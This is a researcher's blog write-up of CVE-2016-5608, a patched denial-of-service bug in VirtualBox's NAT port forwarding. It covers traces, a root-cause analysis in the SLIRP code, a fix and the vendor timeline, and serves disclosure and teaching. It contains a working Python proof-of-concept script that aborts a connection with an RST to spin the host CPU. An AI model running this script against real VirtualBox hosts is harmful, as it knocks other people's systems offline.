Last year I discovered a remote denial-of-service flaw in VirtualBox affecting versions prior to 5.1.8 (prior to 5.0.28 on the 5.0 branch, and at least 4.3.36 as well). In the spirit of responsible disclosure, one year and many VirtualBox versions later, I present to you a small write-up of CVE-2016-5608.

Oracle's CSO apparently has some pretty strong opinions regarding security research on their products, so this one goes out to you, Mary Ann. 😉

Networking in VirtualBox

VirtualBox allows users to forward single TCP/UDP ports from the host to any network interface inside the virtual machine. For most purposes, this is more convenient than bridging entire interfaces or routing across host-only interfaces.

The listen port on the host is bound by the VirtualBox process using the host's socket API. This, of course, means that VirtualBox needs to re-wrap received data in the respective transport protocol so it can be delivered to the process listening on the guest IP and port. That's a rather simple task for stateless UDP datagrams, but TCP is where it gets messy: VirtualBox has to keep the host-side socket and its own emulated TCP connection to the guest in sync, including how and when either side closes the connection.
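To illustrate the TCP part, here is a simplified socket-to-socket analogue in Python. It is not how VirtualBox works internally (SLIRP translates between a host socket and emulated TCP segments for the guest), and the helper name pump() is hypothetical. It only shows one direction of a relay and why an incoming FIN has to be passed on as a half-close rather than a full close: the opposite direction may still be carrying data.

```python
import socket


def pump(src: socket.socket, dst: socket.socket, bufsize: int = 65536) -> int:
    """Relay bytes from src to dst until src hits EOF, then half-close dst.

    Hypothetical helper for illustration; returns the number of bytes relayed.
    """
    total = 0
    while True:
        chunk = src.recv(bufsize)
        if not chunk:  # b"" means the peer will not send anything more (FIN)
            break
        dst.sendall(chunk)
        total += len(chunk)
    try:
        # Pass the FIN on, but only for this direction: the other direction
        # may still be carrying data (TCP half-close).
        dst.shutdown(socket.SHUT_WR)
    except OSError:
        pass  # the other side may already be gone
    return total


if __name__ == "__main__":
    # Two socket pairs stand in for "client <-> relay" and "relay <-> guest".
    client, relay_in = socket.socketpair()
    relay_out, guest = socket.socketpair()

    client.sendall(b"GET / HTTP/1.0\r\n\r\n")
    client.shutdown(socket.SHUT_WR)       # the client is done sending
    print(pump(relay_in, relay_out))      # relays 18 bytes, then half-closes
```

Running pump() once per direction (for example in two threads) gives a complete, if naive, forwarder. Closing both sockets as soon as one side sends a FIN would cut off data still flowing the other way.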

Hitting the bug by accident

I was playing around with Vagrant. My original goal was to confine Plex Media Server (shady-looking, semi-closed-source software) inside a virtual machine so I could run multiple instances concurrently. For authentication and proper SSL support, I additionally set up nginx as a reverse proxy.

Everything worked well, with only one minor annoyance: sometimes, after a Plex video had been paused for a few minutes, resuming it would fail with "An error occurred". I'd have to restart playback, Plex would pick up where I had left off, and all was well.

Now this is where it gets interesting: after a few days, I noticed that all host CPU cores were saturated at all times, even though there was no activity inside the virtual machines at all.

A quick trace of the VBoxHeadless process yielded a never-ending stream of calls to recvfrom(), ioctl() and shutdown() on a disconnected socket:

    $ sudo dtruss -p 59239
    [...]
    recvfrom(0x1A, 0x7FA82D98AE00, 0x100A4) = 0 0
    ioctl(0x1A, 0x4004667F, 0x70000E743D28) = 0 0
    shutdown(0x1A, 0x0, 0x0) = -1 Err#57
    recvfrom(0x19, 0x7FA82D97AC00, 0x100A4) = 0 0
    ioctl(0x19, 0x4004667F, 0x70000E743D28) = 0 0
    shutdown(0x19, 0x0, 0x0) = -1 Err#57
    ^C
    $ grep '^#define.*57' /usr/include/sys/errno.h
    #define ENOTCONN 57 /* Socket is not connected */
    $

(Note: the above output is from dtruss, OS X's equivalent to Linux strace)
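The ioctl() request code can be decoded using the BSD encoding from <sys/ioccom.h>. The helper names below are hypothetical; the sketch shows that 0x4004667F is _IOR('f', 127, int), which <sys/filio.h> defines as FIONREAD (the number of bytes waiting to be read). The second argument of shutdown() is 0, i.e. SHUT_RD. Each loop iteration therefore reads EOF, asks how many bytes are pending, and tries to shut down the read side of a socket that is no longer connected.

```python
# Request-code layout from BSD/macOS <sys/ioccom.h>:
# bits 29-31 direction, bits 16-28 parameter length, bits 8-15 group, bits 0-7 number.
IOCPARM_MASK = 0x1FFF
IOC_VOID = 0x20000000
IOC_OUT = 0x40000000    # kernel copies data out to user space ("read")
IOC_IN = 0x80000000     # kernel copies data in from user space ("write")
IOC_DIRMASK = 0xE0000000

_DIRECTIONS = {
    IOC_VOID: "_IO",
    IOC_OUT: "_IOR",
    IOC_IN: "_IOW",
    IOC_IN | IOC_OUT: "_IOWR",
}


def ioc(direction: int, group: str, num: int, length: int) -> int:
    """Build a request code the way the _IOC() macro does."""
    return direction | ((length & IOCPARM_MASK) << 16) | (ord(group) << 8) | num


def decode_ioctl(request: int):
    """Split a request code into (macro, group, number, parameter length)."""
    macro = _DIRECTIONS.get(request & IOC_DIRMASK, "?")
    length = (request >> 16) & IOCPARM_MASK
    group = chr((request >> 8) & 0xFF)
    number = request & 0xFF
    return macro, group, number, length


if __name__ == "__main__":
    print(decode_ioctl(0x4004667F))        # ('_IOR', 'f', 127, 4)
    print(hex(ioc(IOC_OUT, "f", 127, 4)))  # 0x4004667f, i.e. FIONREAD
```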

Now the correlation between high CPU usage and the weird disconnects dawned on me; a quick tcpdump while triggering the Plex annoyance confirmed that the rogue processes were indeed related to networking activity.



The above connection is between nginx (source port 37313) and VirtualBox (listening on port 4201). The green frames are chunks of the HTTP response body from inside the virtual machine, destined for the nginx reverse proxy. Notice how in the second frame, nginx acknowledges the previous chunk and then, in the third frame, gracefully signals a connection shutdown by sending a FIN+ACK message.

However, for reasons unknown, VirtualBox continues sending chunks of the HTTP body despite having already received a FIN. nginx reacts by dropping the connection, sending a last RST (connection reset).

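I honestly have no idea why VirtualBox keeps sending data after the FIN. Strictly speaking, TCP allows it: a FIN only announces that the sender won't transmit any more data (a half-close), and it was nginx having fully closed its socket that turned the extra data into an RST. Still, I suspect this is a separate issue in VirtualBox (or rather SLIRP, the userland TCP/IP emulation behind VirtualBox's NAT networking). But that's a problem for another day. 🙃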

Reproducing the issue

Due to VirtualBox's eagerness to send us TCP segments which we didn't request, I suspected that the bug might only be triggered when some output buffer somewhere is filled to some extent.

So, to develop our proof of concept, we set up TCP port forwarding (as described above) and run a server inside the guest that, as soon as somebody connects, pumps out as much data as it can:

    $ dd if=/dev/urandom of=./hugeassfile bs=102400 count=10240
    $ while true; do nc -l -p 1234 < ./hugeassfile; done
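For reference, dd writes 102400 × 10240 = 1,048,576,000 bytes, i.e. 1000 MiB. If you'd rather not put that on disk, a Python server along these lines should behave similarly. serve_random() is a hypothetical helper, and unlike the nc loop it generates fresh random data per chunk instead of replaying a file.

```python
import os
import socket


def serve_random(listener: socket.socket, max_clients=None, chunk_size: int = 65536) -> int:
    """Stream random bytes to each client until it disconnects.

    Hypothetical stand-in for the dd/nc loop; returns the number of clients served.
    """
    served = 0
    while max_clients is None or served < max_clients:
        conn, _addr = listener.accept()
        with conn:
            try:
                while True:
                    conn.sendall(os.urandom(chunk_size))
            except OSError:
                # Client went away (BrokenPipeError/ConnectionResetError);
                # Python ignores SIGPIPE by default, so this surfaces as an exception.
                pass
        served += 1
    return served
```

Inside the guest, serve_random(socket.create_server(("0.0.0.0", 1234))) would listen on the same port as the nc loop and serve clients one after another (socket.create_server() needs Python 3.8 or later).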

I first thought about using scapy, a really powerful packet manipulation framework for Python. It would definitely allow us to model every aspect (timing, flags, packet order, ...) of our captured connection. But after looking at examples for the TCP three-way handshake alone, I decided to start with something simpler: the good ol' socket API. After all, that's what nginx seems to be using.

A few lines of Python are sufficient to connect to a port, read a few packets and then abort the connection. Neither socket.close() nor socket.shutdown() has a documented flag to force-close the connection with an RST packet. However, there's a neat trick: setting the SO_LINGER socket option with a linger timeout of zero:

    #!/usr/bin/python
    # Causes 100% CPU usage by the network thread when pointed to a vbox
    # NATed port (lasts for at least 10 seconds, indefinitely on some
    # systems). valentin@unimplemented.org
    #
    # Tested on Linux 4.9.0-4 (debian stretch)

    import socket
    import struct
    import sys
    import time

    # Minimum allowed TCP segment size depends on the host OS
    min_seg_size = 128

    if __name__ == "__main__":
        if len(sys.argv) < 3:
            print("Usage: trigger.py ip port")
            sys.exit(1)

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        s.connect((str(sys.argv[1]), int(sys.argv[2])))
        s.setsockopt(socket.IPPROTO_TCP, socket.TCP_MAXSEG, min_seg_size)
        # Read a few segments' worth of data and leave the rest unread
        s.recv(min_seg_size * 4)
        # Graceful shutdown first: this sends a FIN, just like nginx did
        s.shutdown(socket.SHUT_RDWR)
        # SO_LINGER with l_onoff=1, l_linger=0: close() aborts with an RST
        s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
        # Leave a short gap between the FIN and the RST, as in the capture
        time.sleep(0.2)
        s.close()

Et voilà!
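The SO_LINGER trick boils down to packing a C struct linger, which on Linux and macOS consists of two ints (l_onoff, l_linger). Here is a small sketch with hypothetical helper names that also reads the option back to confirm it took effect:

```python
import socket
import struct

# struct linger { int l_onoff; int l_linger; } as laid out on Linux and macOS.
LINGER = struct.Struct("ii")


def set_abortive_close(sock: socket.socket) -> None:
    """Make the next close() abort the connection with an RST instead of a FIN."""
    # l_onoff = 1 enables lingering; l_linger = 0 means "don't wait at all",
    # so the kernel discards unsent data and resets the connection on close().
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, LINGER.pack(1, 0))


def get_linger(sock: socket.socket):
    """Read back the current (l_onoff, l_linger) pair."""
    raw = sock.getsockopt(socket.SOL_SOCKET, socket.SO_LINGER, LINGER.size)
    return LINGER.unpack(raw)
```

Calling set_abortive_close(s) right before s.close() is equivalent to the SO_LINGER line in the PoC above.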

Isolating the issue

Since we can now reproduce the issue in a clean environment, it's time to start digging into VirtualBox code. Conveniently, Debian offers packaged debug symbols for VirtualBox.

After attaching gdb to the virtual machine's process, we need to select the thread handling the NatDrv driver (info threads followed by thread <threadid>). We can now try to catch the shutdown syscall with the gdb command catch syscall shutdown. This lands us in sofcantrcvmore() in src/VBox/Devices/Network/slirp/socket.c, which is called from soread() in the same file.

Consider the following snippet from soread(), which effectively executes the failing sofcantrcvmore() (i.e. our shutdown()):

    fUninitiolizedTemplate = RT_BOOL((   sototcpcb(so)
                                      && (   sototcpcb(so)->t_template.ti_src.s_addr == INADDR_ANY
                                          || sototcpcb(so)->t_template.ti_dst.s_addr == INADDR_ANY)));
    /* nn == 0 means peer has performed an orderly shutdown */
    Log2(("%s: disconnected, nn = %d, errno = %d (%s)\n",
          RT_GCC_EXTENSION __PRETTY_FUNCTION__, nn, errno, strerror(errno)));
    sofcantrcvmore(so);
    if (!fUninitiolizedTemplate)
        tcp_sockclosed(pData, sototcpcb(so));
    else
        tcp_drop(pData, sototcpcb(so), errno);

Apparently, after the call to sofcantrcvmore(), tcp_sockclosed() is called, which either doesn't change the socket's state at all, or changes it only for it to be changed back somewhere else later. In any case, tcp_close() never gets called, which leaves the connection hanging around in the same semi-closed state our PoC's RST packet left it in. The next pass over the socket therefore hits the same EOF again, producing the endless recvfrom()/ioctl()/shutdown() loop seen in the trace.
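The host-side symptoms can be reproduced with plain sockets. The following sketch (hypothetical helper, assuming a Linux host and the loopback interface) resets a connection with the SO_LINGER trick and probes the surviving end: the reset is reported once, after which recv() returns 0 just as after an orderly shutdown, while shutdown() fails with ENOTCONN. In other words, recv() returning 0 does not guarantee that the connection is still in an orderly half-closed state.

```python
import errno
import socket
import struct


def reset_then_probe(timeout: float = 5.0):
    """Reset a loopback TCP connection and probe the surviving end.

    Returns (first recv outcome, second recv result, shutdown errno or 0).
    """
    with socket.create_server(("127.0.0.1", 0)) as listener:
        client = socket.create_connection(listener.getsockname())
        conn, _ = listener.accept()
    conn.settimeout(timeout)

    # Abortive close on the client side: the kernel sends an RST, no FIN.
    client.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1, 0))
    client.close()

    try:
        first = conn.recv(1)            # the pending reset is reported once...
    except ConnectionResetError:
        first = "ECONNRESET"
    second = conn.recv(1)               # ...after that, recv() just reports EOF (b"")
    try:
        conn.shutdown(socket.SHUT_RD)   # the call soread() keeps retrying
        shutdown_errno = 0
    except OSError as exc:
        shutdown_errno = exc.errno
    conn.close()
    return first, second, shutdown_errno


if __name__ == "__main__":
    first, second, err = reset_then_probe()
    print(first, second, errno.errorcode.get(err, err))
```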

As a quick workaround, I simply reset errno to zero before the call to sofcantrcvmore() and changed the conditional to execute tcp_drop() if errno changes during sofcantrcvmore() (i.e. when shutdown() sets it to ENOTCONN). This solved the problem for me: the connection now gets dropped as soon as shutdown() fails, which sounds okay to me in terms of semantics:

    errno = 0;
    sofcantrcvmore(so);
    if (fUninitiolizedTemplate || errno != 0)
        tcp_drop(pData, sototcpcb(so), errno);
    else
        tcp_sockclosed(pData, sototcpcb(so));

(Note that I also removed the double negative in !fUninitiolizedTemplate, which is why the if and else branches are swapped.)

Vendor response

Oracle patched the issue in its Critical Patch Update of October 18th, 2016, following my initial report on August 30th, 2016.

As expected, my quick fix was incomplete: when compiled with debugging flags (which usually isn't the case, though), sofcantrcvmore() might call a logging function, which might clobber errno again. The correct solution is to return shutdown()'s errno instead and check it in the caller. The entire diff can be found here; sadly, Oracle does not provide SVN access, hence the manual diff.
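The difference between inspecting errno after the fact and returning the error can be modelled in a few lines of Python. This is only an illustration of the approach described above, not Oracle's actual patch: the function names loosely mirror the C functions, and the string results are placeholders for the calls to tcp_drop() and tcp_sockclosed().

```python
import socket


def cant_rcv_more(sock) -> int:
    """Shut down the read side and *return* the error instead of leaving it in a global.

    Loosely modelled on sofcantrcvmore(); returns 0 on success or the errno value.
    """
    try:
        sock.shutdown(socket.SHUT_RD)
    except OSError as exc:
        return exc.errno
    return 0


def on_orderly_eof(sock, template_uninitialized: bool, log=print) -> str:
    """Decide what to do when recv() returned 0, mirroring the branch in soread()."""
    err = cant_rcv_more(sock)
    # Logging after the call can no longer clobber the result: it lives in a local.
    log(f"read side closed, shutdown error = {err}")
    if template_uninitialized or err != 0:
        return "tcp_drop"        # connection is gone: tear it down
    return "tcp_sockclosed"      # orderly close: continue the normal close sequence
```

Any object with a shutdown() method works here; a socket that was reset, as in the dtruss trace, makes shutdown() fail with ENOTCONN and leads to "tcp_drop".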

The bug was assigned CVE-2016-5608, with the following description:

Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox.

I'm mostly okay with this; however, I disagree with the limited scope implied by "attacker with logon to the infrastructure". All the attack requires is the ability to open a TCP connection to a forwarded port. While it's true that some application-level firewalls will protect you from this attack, they are by no means a widely employed measure to limit logons to the infrastructure, at least not in a non-enterprise context.

VirtualBox, for example, is the default provider for Vagrant, a popular management layer for virtual machines that is designed for development but also used in production. Until the introduction of bhyve, VirtualBox was also the only viable solution for hardware-assisted virtualization on FreeBSD.